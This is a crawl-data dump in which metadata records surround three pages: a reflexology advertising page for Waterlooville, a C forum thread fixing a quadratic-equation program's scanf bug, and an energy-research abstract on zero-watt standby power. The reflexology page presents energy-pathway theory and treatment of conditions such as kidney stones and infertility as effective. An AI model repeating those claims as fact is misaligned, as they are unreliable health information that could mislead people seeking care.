"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.6",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
8,797,959,247,724,348,000
|
Reflexology Waterlooville
Waterlooville Reflexology (PO7): There are occasions it seems like a paracetamol or whatever it is you've been swallowing all your life for your aches and pains just does not seem to work anymore. Quite possibly a more suitable substitute might be to have a bash at reflexology or one of the alternative treatments that are available currently. A well known complimentary therapy that's helping large numbers of men and women with their medical problems all over the world, reflexology can often be amazingly effective.
Reflexology in Waterlooville PO7
Reflexology treatment should not be considered as a replacement for conventional medicine, even though it can be extremely effective for a number of illnesses. But instead as an alternate therapy as there are plenty of positive benefits that may be gained from going through a couple of reflexology sessions. Identifying a practiced local reflexologist should be your first step, so that you can tell them about your health concerns and discover if they've got a solution.
Reflexology - An Outline
In areas such as Egypt, Japan, India and China practices that were similar to reflexology were used for millennia. The relief of pain by applying pressure to certain parts of the body (especially the feet and hands), is a concept of reflexology that's been adopted through the ages by several civilizations and peoples. An ENT doctor called William Fitzgerald was the one responsible for the modern day version of reflexology, which was described in his book "Zone Therapy for Relieving Pain in the Home" in 1917. In the nineteen thirties a physiotherapist called Eunice Ingham (1889 - 1974) enlarged on his ideas.
Reflexologists Waterlooville Hampshire PO7
Reflexology is a non-intrusive complementary and alternative medicine that works by controlling the natural energy pathways through the body to reach increased wellness, balance and thus help in the healing process. It's often assumed that a reflexologist works just on the feet of patients, but in fact they may also focus on other parts of the body wherever the reflexes are joined with the energy pathways, for example the ears, hand, face and lower leg. During a reflexology procedure, pressure is applied to areas of the body to realign the energy pathways.
Many common grounds for trying out the expertise of a reflexologist include such things as: period pain, sinusitis, back pain, maternity ailments, bladder complaints, irritable bowel syndrome, joint pain, anxiety, sleeping disorders and migraines. However you should speak with your local Waterlooville reflexologist to find out exactly what they can do for you, as this is certainly not an exhaustive list.
Waterlooville Doctor's Advice PO7
Before beginning any course of treatment a knowledgeable Waterlooville reflexologist will collect a full medical history and ask for details in relation to lifestyle, diet and health. These will assist them to design a treatment plan which is tailored for you. The reflexologist should discuss all the aspects of your treatment plan and just how you will benefit, they'll also be able to address any questions and reservations that you might have about the process.
Because it's over and above their remit and qualifications, no principled reflexologist will suggest diagnoses nor offer professional medical advice. Prior to seeking treatment from a reflexologist or any other alternative practitioner, you must be sure to seek seek medical advice from your G.P. If your doctor believes a course of reflexology might help, then it can be employed together with conventional procedures. While the reflexology healing continues you should still confer with your doctor regarding your progress.
Book Reflexology in Waterlooville
All reflexologists must have the proper insurance cover and have membership of a professional organization, such as the British Reflexology Association (BRA) or the Association of Reflexologists (AOR). A Diploma (Level 3) in Reflexology and Complementary Therapies is recognized as the standard qualification that somebody needs to advertise themselves as a reflexologist. Treating patients in Great Britain is not allowed unless they have achieved this Diploma.
Hand Reflexology
Hand Reflexology Waterlooville PO7
Although in Britain, hand reflexology is not as widely used as traditional foot reflexology, it is equally as effective. Similar to the feet, the hands have reflex zones which connect with the glands and organs, working on them can boost blood circulation and rebalance and relax the whole body. A hand reflexology treatment is often extremely effective even though these reflex points are much deeper and the hands aren't as sensitive as the feet. This type of reflexology treatment could be utilized independently or in combination with a regular foot reflexology treatment.
Reflexology Zones
Foot Chart
Within our face, feet and hands there are various reflex points which are connected to all of the glands, systems and organs within our bodies. A reflexologist will focus on these reflex zones to ease aches and pains in those corresponding parts. It shouldn't be confused with a foot massage (which simply involves rubbing the the feet), since it is focused on pressure zones within the feet. Reflexologists need to hit these deeply situated pressure zones using the appropriate amount of force and at exact angles, meaning it's a lot more than a simple massage. They're going to begin working on one foot at a time and they often administer a little essential oil or tea tree powder onto your foot to make it simpler as they get to work on the pressure points using their thumbs and fingers.
To Summarize
In this article we set out to address a few questions such as "what is reflexology?", "what can be cured by reflexology?", "where can I find a reflexologist near Waterlooville?" and "what qualifications does a reflexologist need?". We've endeavored to address as many of these queries as we can, and in doing so eased any other fears or doubts you might have concerning reflexology in general.
Individuals who have been involved with the advancement of present day reflexology practices include: Eunice Ingham, Doctor William H Fitzgerald (1872 - 1942), Edwin Bowers, Dwight Byers and Doreen Bayly.
Waterlooville reflexologists can usually help with reflexology for migraines, reflexology for prostate problems in Waterlooville, face reflexology, baby reflexology, reflexology for stress, reflexology for snoring, reflexology for constipation, hand reflexology for pcos, reflexology to help sleep in Waterlooville, traditional foot reflexology, reflexology for vertigo, reflexology for kidney stones, reflexology for menstrual cramps in Waterlooville, reflexology for tennis elbow in Waterlooville, reflexology and acupressure in Waterlooville, reflexology for conception, reflexology for endometriosis, reflexology for fertility in Waterlooville, hand reflexology for sleep in Waterlooville, hot stone reflexology, reflexology for asthma in Waterlooville, reflexology for backaches, foot reflexology and other reflexology treatments in Waterlooville, Hampshire.
Reflexology Treatments Waterlooville Hampshire
Also find: Horndean reflexology, Anmore reflexology, Rowlands Castle reflexology, Blendworth reflexology, Clanfield reflexology, Denmead reflexology, Stakes reflexology, Lovedean reflexology, Bedhampton reflexology, Widley reflexology, Red Hill reflexology, Leigh Park reflexology, Havant reflexology, Purbrook reflexology, Cowplain reflexology, Catherington reflexologists and more.
In Hampshire you can also find: Anna Valley reflexologists, Sherfield on Loddon reflexologists, Meonstoke reflexology, Bramshott reflexology treatments, Upper Clatford reflexology treatments, Ringwood reflexology treatments, Sherfield on Loddon reflexology sessions, Netley Marsh reflexology treatments, Rushmoor reflexology sessions, Waltham Chase reflexology, Baughurst reflexology sessions, Sutton Scotney reflexology, Charlton reflexology, Odiham reflexology, Eversley reflexologists, Hyde reflexology, Kingsclere reflexologists, Widley reflexology, Fawley reflexology sessions, Otterbourne reflexologists, Milford on Sea reflexology treatments, Colbury reflexology sessions, Littleton reflexologists, Nursling reflexology sessions.
Places near Waterlooville: Horndean, Clanfield, Stakes, Leigh Park, Purbrook, Cowplain, Lovedean, Anmore, Denmead, Catherington, Havant, Widley, Bedhampton, Rowlands Castle, Blendworth, Red Hill.
Reflexologists in PO7 area.
TOP - Reflexology Waterlooville
Reflexology Healing Waterlooville - Reflexologists Waterlooville - Zone Therapy Waterlooville - Reflexologist Waterlooville - Maternity Reflexology Waterlooville - Reflexology Waterlooville - Weight Loss Reflexology Waterlooville - Foot Reflexology Waterlooville - PO7
HOME
|
{
"url": "http://www.reflexology.expertsz.co.uk/waterlooville.html",
"source_domain": "www.reflexology.expertsz.co.uk",
"snapshot_id": "crawl=CC-MAIN-2019-39",
"warc_metadata": {
"Content-Length": "18318",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:67JF6HAES53E2GFJMU4EU42TFDGM7A4A",
"WARC-Concurrent-To": "<urn:uuid:d9842ec4-2ca7-443a-a5c1-0a3a39e9cd11>",
"WARC-Date": "2019-09-17T03:22:17Z",
"WARC-IP-Address": "109.203.114.103",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:NF3LZ3D5EXQVH6MLVUMQIYIMSBM7TMDL",
"WARC-Record-ID": "<urn:uuid:8aba7f7d-daa1-4026-a9f7-46ecef5964d4>",
"WARC-Target-URI": "http://www.reflexology.expertsz.co.uk/waterlooville.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:246e588b-fa86-4d2b-a308-28c0ba4a7f5e>"
},
"warc_info": "isPartOf: CC-MAIN-2019-39\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-24.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
26,
27,
547,
548,
581,
582,
1055,
1056,
1081,
1082,
1697,
1698,
1741,
1742,
2305,
2306,
2714,
2715,
2749,
2750,
3216,
3217,
3743,
3744,
3778,
3779,
4242,
4243,
4260,
4261,
4296,
4297,
4874,
4875,
4893,
4894,
4905,
4906,
5699,
5700,
5713,
5714,
6108,
6109,
6314,
6315,
7179,
7180,
7227,
7228,
7612,
7613,
8350,
8351,
8547,
8548,
8576,
8577,
8609,
8610,
8879,
8880
],
"line_end_idx": [
26,
27,
547,
548,
581,
582,
1055,
1056,
1081,
1082,
1697,
1698,
1741,
1742,
2305,
2306,
2714,
2715,
2749,
2750,
3216,
3217,
3743,
3744,
3778,
3779,
4242,
4243,
4260,
4261,
4296,
4297,
4874,
4875,
4893,
4894,
4905,
4906,
5699,
5700,
5713,
5714,
6108,
6109,
6314,
6315,
7179,
7180,
7227,
7228,
7612,
7613,
8350,
8351,
8547,
8548,
8576,
8577,
8609,
8610,
8879,
8880,
8884
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 8884,
"ccnet_original_nlines": 62,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3733243942260742,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.013404830358922482,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.14544236660003662,
"rps_doc_frac_unique_words": 0.4036334753036499,
"rps_doc_mean_word_length": 5.808056831359863,
"rps_doc_num_sentences": 47,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.442375183105469,
"rps_doc_word_count": 1266,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.03046376071870327,
"rps_doc_frac_chars_top_3gram": 0.014143889769911766,
"rps_doc_frac_chars_top_4gram": 0.011831910349428654,
"rps_doc_books_importance": -549.1316528320312,
"rps_doc_books_importance_length_correction": -549.1316528320312,
"rps_doc_openwebtext_importance": -264.4056701660156,
"rps_doc_openwebtext_importance_length_correction": -264.4056701660156,
"rps_doc_wikipedia_importance": -186.8250732421875,
"rps_doc_wikipedia_importance_length_correction": -186.8250732421875
},
"fasttext": {
"dclm": 0.03918420895934105,
"english": 0.9307326078414917,
"fineweb_edu_approx": 2.087937831878662,
"eai_general_math": 0.02844947949051857,
"eai_open_web_math": 0.24050843715667725,
"eai_web_code": 0.007635829970240593
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.857",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "615.8",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "6",
"label": "Content Listing"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,305,100,395,240,033,000
|
New, please help, no compiler error but does not execute
This is a discussion on New, please help, no compiler error but does not execute within the C Programming forums, part of the General Programming Boards category; Hi everyone I am having some trouble with a program meant to solve for x in ax^2+bx+c=0 given user-input values ...
1. #1
Registered User
Join Date
Feb 2011
Posts
8
New, please help, no compiler error but does not execute
Hi everyone
I am having some trouble with a program meant to solve for x in ax^2+bx+c=0 given user-input values for a, b, and c. This is homework and my professor requires separate functions for the input and operations in the main function and constants for any numbers in equations. The assignment also requires that we use if else statements to determine the value of x. The assignment sheet can be found here: Assignment G1 if you want any more clarification
I have written a code for it that I think should work and the compiler (DEV-C++) does not find any errors. However, when I try to execute the program it allows me to input the values but when I press Enter windows tells me the program has encountered an error and needs to close and asks if I want to send an error report. If any of you can help me I would greatly appreciate it!
Here is the code:
Code:
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
void getData (double* ptrA, double* ptrB, double* ptrC);
double determine (double coefA, double coefB, double coefC);
int main (void)
{
double coefA;
double coefB;
double coefC;
getData(&coefA, &coefB, &coefC);
determine(coefA, coefB, coefC);
system("pause");
return 0;
}
void getData (double*ptrA, double*ptrB, double*ptrC)
{
double coefA;
double coefB;
double coefC;
printf("This function solves for x in the equation ax*x+bx+c=0. Please\n");
printf("enter values for coefficients a, b, and c: ");
scanf("%f %f %f", coefA, coefB, coefC);
*ptrA = coefA;
*ptrB = coefB;
*ptrC = coefC;
return;
}
double determine (double coefA, double coefB, double coefC)
{
double x;
double det;
double solA;
double solB;
const int number1 = 2;
const int number2 = 4;
double rootDet;
if ((coefA == 0) && (coefB == 0) && (coefC == 0))
printf("Any value of x is a solution.\n");
else if ((coefA == 0) && (coefB == 0) && (coefC != 0))
printf("No solution exists.\n");
else if ((coefA == 0) && (coefB != 0))
{
x = -coefC / coefB;
printf("The value of x is %f\n", x);
}
else if (coefA != 0)
{
det = (coefB * coefB) - (number2 * coefA * coefC);
if (det == 0)
{
x = -coefB / (number1 * coefA);
printf("The value of x is %f.\n", x);
}
else if (det > 0)
{
rootDet = sqrt(det);
solA = (-coefB + rootDet) / (number1 * coefA);
solB = (-coefB - rootDet) / (number1 * coefA);
printf("The solutions are %f and %f.\n", solA, solB);
}
else if (det < 0)
printf("The solutions have an imaginary component.\n");
return;
}}
2. #2
Registered User
Join Date
May 2010
Posts
2,900
Your scanf on line 28 seems to be missing something. See this link for scanf.
Jim
3. #3
Registered User
Join Date
May 2009
Posts
2,747
Code:
scanf("%f %f %f", coefA, coefB, coefC);
scanf requires the address of the variable.
like this
Code:
scanf("%f %f %f", &coefA, &coefB, &coefC);
Note: I think %f is the wrong choice for double; I am not sure.
Tim S.
Last edited by stahta01; 02-23-2011 at 12:09 PM. Reason: Grammer
4. #4
Registered User
Join Date
Feb 2011
Posts
8
Wow, cant believe I missed that! Sorry everyone haha.
Now it executes, however no matter what values I input for a, b, and c, it prints "The value of x is -257._______). The decimals of x are slightly different depending on the coefficients. I have looked over the code a few times and I dont see why I am getting that answer. For some reason the if else statements are not working for 0 0 0 or 0 0 1, etc.
Sorry for the questions, I am completely new to programming and I am not very good with computers in the first place. I'm enjoying it, but get tripped up easily!
Thanks so much guys, I really appreciate the help.
Sam
5. #5
Registered User
Join Date
May 2010
Posts
2,900
Did you change the '%f' to '%lf'?
If so post the current code.
Jim
6. #6
Registered User
Join Date
Nov 2010
Location
Long Beach, CA
Posts
5,640
To follow up with Jim's comment, your compiler should throw a warning when using the wrong specifiers for scanf and printf. If you're not seeing these messages, turn up all the warnings on your compiler. It will help you catch many potential problems. If you are seeing these warnings, then pay attention to them! They're there for a reason. I got your code to work just fine by using %lf in scanf (didn't work without it). Also, you declare determin() to return a double, but you never return a double. Fix that by making it return void.
7. #7
Registered User
Join Date
Feb 2011
Posts
8
No warnings from the compiler whatsoever on the original code I posted. I will definitely crank up the warnings, I feel like a kid with bumper lanes in bowling haha.
changed that and it works perfectly. Thanks so much everyone! Can't believe they were both so simple
Not really an important question but why does %lf work and %f not? My textbook always shows %f in the example codes.
Last edited by svisger; 02-23-2011 at 12:34 PM.
8. #8
Registered User
Join Date
May 2010
Posts
2,900
Basically because the number of bits required to hold a double is larger than the number of bits required to hold float.
Jim
9. #9
Registered User
Join Date
Feb 2011
Posts
8
oh ok that makes sense. Wish my professor would have said it so simply haha.
Thanks again everyone, I really appreciate it
Sam
Popular pages Recent additions subscribe to a feed
Similar Threads
1. Replies: 8
Last Post: 09-16-2006, 02:18 PM
2. C Compiler and stuff
By pal1ndr0me in forum C Programming
Replies: 10
Last Post: 07-21-2006, 12:07 PM
3. I can't get this new compiler to work.
By Loduwijk in forum C++ Programming
Replies: 7
Last Post: 03-29-2006, 06:42 AM
4. how to call a compiler?
By castlelight in forum C Programming
Replies: 3
Last Post: 11-22-2005, 11:28 AM
5. Help With finding a compiler
By macman in forum A Brief History of Cprogramming.com
Replies: 4
Last Post: 04-15-2005, 09:15 AM
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
|
{
"url": "http://cboard.cprogramming.com/c-programming/135013-new-please-help-no-compiler-error-but-does-not-execute.html",
"source_domain": "cboard.cprogramming.com",
"snapshot_id": "crawl=CC-MAIN-2014-49",
"warc_metadata": {
"Content-Length": "75196",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:JME636J2QLXZIDX4FEJ7S5DRWGVY6HVV",
"WARC-Concurrent-To": "<urn:uuid:01f29a4f-d152-4750-832e-f673213d51a4>",
"WARC-Date": "2014-11-28T03:22:51Z",
"WARC-IP-Address": "76.74.254.184",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:CG6CUJD66RRQWJNQL6C4O2H3XUU3MKE5",
"WARC-Record-ID": "<urn:uuid:eff19b07-1cd3-4080-8fa6-abb6d0f04449>",
"WARC-Target-URI": "http://cboard.cprogramming.com/c-programming/135013-new-please-help-no-compiler-error-but-does-not-execute.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e42da205-2fbd-4533-a2de-af40c26498db>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-235-23-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-49\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for November 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
57,
58,
337,
338,
346,
366,
380,
393,
403,
409,
410,
471,
472,
488,
489,
944,
945,
1329,
1330,
1352,
1353,
1363,
1386,
1410,
1432,
1437,
1498,
1563,
1568,
1588,
1594,
1616,
1638,
1660,
1669,
1710,
1750,
1775,
1793,
1799,
1804,
1861,
1867,
1890,
1913,
1936,
1946,
2031,
2095,
2144,
2168,
2192,
2216,
2233,
2244,
2249,
2313,
2319,
2340,
2363,
2387,
2411,
2445,
2479,
2506,
2518,
2580,
2639,
2705,
2754,
2804,
2817,
2853,
2906,
2924,
2956,
2969,
3040,
3070,
3088,
3142,
3202,
3226,
3260,
3278,
3321,
3390,
3459,
3535,
3559,
3593,
3671,
3690,
3704,
3705,
3713,
3733,
3747,
3760,
3770,
3780,
3862,
3863,
3864,
3872,
3873,
3881,
3901,
3915,
3928,
3938,
3948,
3958,
4002,
4050,
4051,
4065,
4075,
4122,
4190,
4191,
4202,
4271,
4272,
4280,
4300,
4314,
4327,
4337,
4343,
4401,
4402,
4759,
4760,
4926,
4927,
4982,
4983,
4991,
4992,
5000,
5020,
5034,
5047,
5057,
5067,
5105,
5106,
5139,
5140,
5141,
5149,
5150,
5158,
5178,
5192,
5205,
5218,
5237,
5247,
5257,
5800,
5801,
5809,
5829,
5843,
5856,
5866,
5872,
6042,
6043,
6148,
6149,
6270,
6322,
6323,
6331,
6351,
6365,
6378,
6388,
6398,
6523,
6524,
6532,
6533,
6541,
6561,
6575,
6588,
6598,
6604,
6685,
6686,
6736,
6737,
6745,
6746,
6797,
6798,
6814,
6815,
6831,
6867,
6893,
6934,
6950,
6986,
7030,
7071,
7086,
7122,
7151,
7193,
7208,
7244,
7278,
7337,
7352,
7388,
7389
],
"line_end_idx": [
57,
58,
337,
338,
346,
366,
380,
393,
403,
409,
410,
471,
472,
488,
489,
944,
945,
1329,
1330,
1352,
1353,
1363,
1386,
1410,
1432,
1437,
1498,
1563,
1568,
1588,
1594,
1616,
1638,
1660,
1669,
1710,
1750,
1775,
1793,
1799,
1804,
1861,
1867,
1890,
1913,
1936,
1946,
2031,
2095,
2144,
2168,
2192,
2216,
2233,
2244,
2249,
2313,
2319,
2340,
2363,
2387,
2411,
2445,
2479,
2506,
2518,
2580,
2639,
2705,
2754,
2804,
2817,
2853,
2906,
2924,
2956,
2969,
3040,
3070,
3088,
3142,
3202,
3226,
3260,
3278,
3321,
3390,
3459,
3535,
3559,
3593,
3671,
3690,
3704,
3705,
3713,
3733,
3747,
3760,
3770,
3780,
3862,
3863,
3864,
3872,
3873,
3881,
3901,
3915,
3928,
3938,
3948,
3958,
4002,
4050,
4051,
4065,
4075,
4122,
4190,
4191,
4202,
4271,
4272,
4280,
4300,
4314,
4327,
4337,
4343,
4401,
4402,
4759,
4760,
4926,
4927,
4982,
4983,
4991,
4992,
5000,
5020,
5034,
5047,
5057,
5067,
5105,
5106,
5139,
5140,
5141,
5149,
5150,
5158,
5178,
5192,
5205,
5218,
5237,
5247,
5257,
5800,
5801,
5809,
5829,
5843,
5856,
5866,
5872,
6042,
6043,
6148,
6149,
6270,
6322,
6323,
6331,
6351,
6365,
6378,
6388,
6398,
6523,
6524,
6532,
6533,
6541,
6561,
6575,
6588,
6598,
6604,
6685,
6686,
6736,
6737,
6745,
6746,
6797,
6798,
6814,
6815,
6831,
6867,
6893,
6934,
6950,
6986,
7030,
7071,
7086,
7122,
7151,
7193,
7208,
7244,
7278,
7337,
7352,
7388,
7389,
7442
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 7442,
"ccnet_original_nlines": 221,
"rps_doc_curly_bracket": 0.0018812100170180202,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2775641083717346,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.027564100921154022,
"rps_doc_frac_lines_end_with_ellipsis": 0.0045044999569654465,
"rps_doc_frac_no_alph_words": 0.35064104199409485,
"rps_doc_frac_unique_words": 0.3641456663608551,
"rps_doc_mean_word_length": 4.2642388343811035,
"rps_doc_num_sentences": 73,
"rps_doc_symbol_to_word_ratio": 0.008333330042660236,
"rps_doc_unigram_entropy": 5.4149651527404785,
"rps_doc_word_count": 1071,
"rps_doc_frac_chars_dupe_10grams": 0.06765928864479065,
"rps_doc_frac_chars_dupe_5grams": 0.24063937366008759,
"rps_doc_frac_chars_dupe_6grams": 0.21414494514465332,
"rps_doc_frac_chars_dupe_7grams": 0.1898401528596878,
"rps_doc_frac_chars_dupe_8grams": 0.15655791759490967,
"rps_doc_frac_chars_dupe_9grams": 0.0799211710691452,
"rps_doc_frac_chars_top_2gram": 0.027589229866862297,
"rps_doc_frac_chars_top_3gram": 0.03547186031937599,
"rps_doc_frac_chars_top_4gram": 0.04335450008511543,
"rps_doc_books_importance": -689.8448486328125,
"rps_doc_books_importance_length_correction": -689.8448486328125,
"rps_doc_openwebtext_importance": -371.82330322265625,
"rps_doc_openwebtext_importance_length_correction": -371.82330322265625,
"rps_doc_wikipedia_importance": -234.3221893310547,
"rps_doc_wikipedia_importance_length_correction": -234.3221893310547
},
"fasttext": {
"dclm": 0.03996556997299194,
"english": 0.8581137657165527,
"fineweb_edu_approx": 1.0062600374221802,
"eai_general_math": 0.28234612941741943,
"eai_open_web_math": 0.2048608660697937,
"eai_web_code": 0.004540259949862957
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "512.94",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Algebra"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "23",
"label": "Tutorial"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "2",
"label": "Partially Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-5,251,842,489,681,823,000
|
Should the next standby power target be 0-watt?
Should the next standby power target be 0-watt?
TitleShould the next standby power target be 0-watt?
Publication TypeReport
Year of Publication2017
AuthorsAlan K Meier, Hans-Paul Siderius
Date Published06/2017
Abstract
The standby power use of appliances continues to consume large amounts of electricity. Considerable success has been made in reducing each device's use, but these savings have been offset by a huge increase in the number of products using standby power and new power requirements for maintaining network connections. Current strategies to reduce standby have limitations and may not be most appropriate for emerging energy consumption trends. A new strategy for further reductions in standby, the "Standzero" option, encourages electrical products to be designed to operate for short periods without relying on mains-supplied electricity. Energy savings are achieved through enhanced efficiency and by harvesting ambient energy. A sensitivity analysis suggests many appliances could be designed to operate for at least an hour without relying on mains power and, in some cases, may be able to operate indefinitely at zero watts until activated.
LBNL Report Number
LBNL-2001019
|
{
"url": "https://eta.lbl.gov/publications/should-next-standby-power-target-be-0",
"source_domain": "eta.lbl.gov",
"snapshot_id": "crawl=CC-MAIN-2020-50",
"warc_metadata": {
"Content-Length": "48836",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SGD4UUUMEJJZP4OJY3DDWKFDCOBDXYOG",
"WARC-Concurrent-To": "<urn:uuid:4ba6b30e-5aec-4fcd-8f5f-106c27d838d4>",
"WARC-Date": "2020-12-05T05:56:55Z",
"WARC-IP-Address": "104.18.24.153",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:DGNEC55VI2ZVCPKOXNK5FTQISCWBQDNT",
"WARC-Record-ID": "<urn:uuid:7673c58f-6c2b-4da0-a176-dd15b7f63ffc>",
"WARC-Target-URI": "https://eta.lbl.gov/publications/should-next-standby-power-target-be-0",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e6d59dbf-9d4c-4931-80eb-fa7f9feb1231>"
},
"warc_info": "isPartOf: CC-MAIN-2020-50\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-245.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
48,
49,
97,
98,
151,
174,
198,
238,
260,
269,
270,
1215,
1216,
1235,
1236
],
"line_end_idx": [
48,
49,
97,
98,
151,
174,
